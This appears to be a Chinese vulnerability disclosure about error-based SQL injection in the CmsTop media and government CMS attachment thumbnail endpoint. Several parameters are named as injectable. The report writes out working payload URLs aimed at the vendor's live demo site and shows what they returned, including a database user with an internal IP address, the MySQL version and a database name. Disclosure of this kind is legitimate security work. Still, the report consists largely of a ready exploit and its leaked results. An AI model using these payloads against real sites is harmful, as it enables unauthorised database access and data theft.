CmsTop媒体云&政务版SQL报错注入漏洞（XPATH）

### 简要描述： RT 多个参数存在隐患 注入比较隐蔽~ ### 详细说明： CMSTOP比较难挖 [WooYun: CMSTOP媒体云&政务版SQL报错注入漏洞（XPATH）](http://www.wooyun.org/bugs/wooyun-2015-0142783) 厂商官网：http://www.cmstop.com/ 产品涉及： ``` CmsTop 媒体版 面向媒体提供“PC站＋手机站＋手机端＋平板端”多终端一体化新媒体技术解决方案，助力媒体融合转型。 媒体云 CmsTop 媒体云 作为媒体云时代的开创者，思拓合众颠覆了传统的软件采购和项目外包模式，与传媒集团建立战略合作伙伴关系，以互联网思维和云计算技术为基础整合集团、区域和行业内的媒体及政务新媒体资源，共同建设和运营媒体云。 政务版 CmsTop 政务版 面向党政部门提供多终端一体化的网站群私有云技术解决方案，助力党政部门打造“两微一端”政务新媒体。 ``` 在线演示站点： ``` http://www.cmstop.cn/ ``` 这处SQL出在上传附件处。。。 第一步，需要注册，内部子项功能比较多 [<img src="https://images.seebug.org/upload/201511/031046373b34f6274530d45c5f1b9eae2b533754.png" alt="1103-SQL.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/031046373b34f6274530d45c5f1b9eae2b533754.png) 然后就找到某子项，上传附件处，抓包 正常数据包： [<img src="https://images.seebug.org/upload/201511/031043509af12ee75c2d03bebf12607615969525.png" alt="1103-SQL-OK.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/031043509af12ee75c2d03bebf12607615969525.png) 注入地址： ``` http://site.cmstop.cn/system/attachment/thumblist?tags=&offset=0&size=35&width=250&height=100 ``` 多个参数可注入，如：tags、size、width、height 开发测试可能忽略了这一处 [<img src="https://images.seebug.org/upload/201511/0310471077a7f5ce7bf592b448e9f3b3204cc92f.png" alt="1103-SQL-1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/0310471077a7f5ce7bf592b448e9f3b3204cc92f.png) 证明其中一个参数 随便挑一个参数：width 提交： ``` http://site.cmstop.cn/system/attachment/thumblist?tags=&offset=0&size=35&width=250 AND (SELECT 1 FROM (SELECT COUNT(Table_name),CONCAT(user(),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a)&height=100 ``` [<img src="https://images.seebug.org/upload/201511/031048115886e6bbd526d28ba13d212d430c495a.png" alt="1103-SQL-11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/031048115886e6bbd526d28ba13d212d430c495a.png) 注出用户： ``` site_11701@10.162.64.228 ``` 再注一下版本： ``` http://site.cmstop.cn/system/attachment/thumblist?tags=&offset=0&size=35&width=250 AND (SELECT 1 FROM (SELECT COUNT(Table_name),CONCAT(version(),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a)&height=100 ``` [<img src="https://images.seebug.org/upload/201511/03104924df65ebc937490156dcc4ee244e69402b.png" alt="1103-SQL-10.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/03104924df65ebc937490156dcc4ee244e69402b.png) 版本： ``` 5.6.20-log ``` 被前人找到漏洞以后厂商进行了相关修复，把一些配置信息改了 ``` http://site.cmstop.cn/system/attachment/thumblist?tags=&offset=0&size=35&width=250 AND (SELECT 1 FROM (SELECT COUNT(Table_name),CONCAT(version(),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a)&height=100 ``` [<img src="https://images.seebug.org/upload/201511/031055427e8c87756976082f08ebcf806e0810f2.png" alt="1103-SQL-13.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/031055427e8c87756976082f08ebcf806e0810f2.png) 数据库名被改为： ``` site_MDAwMDExN1zAx1 ``` ### 漏洞证明： 已证明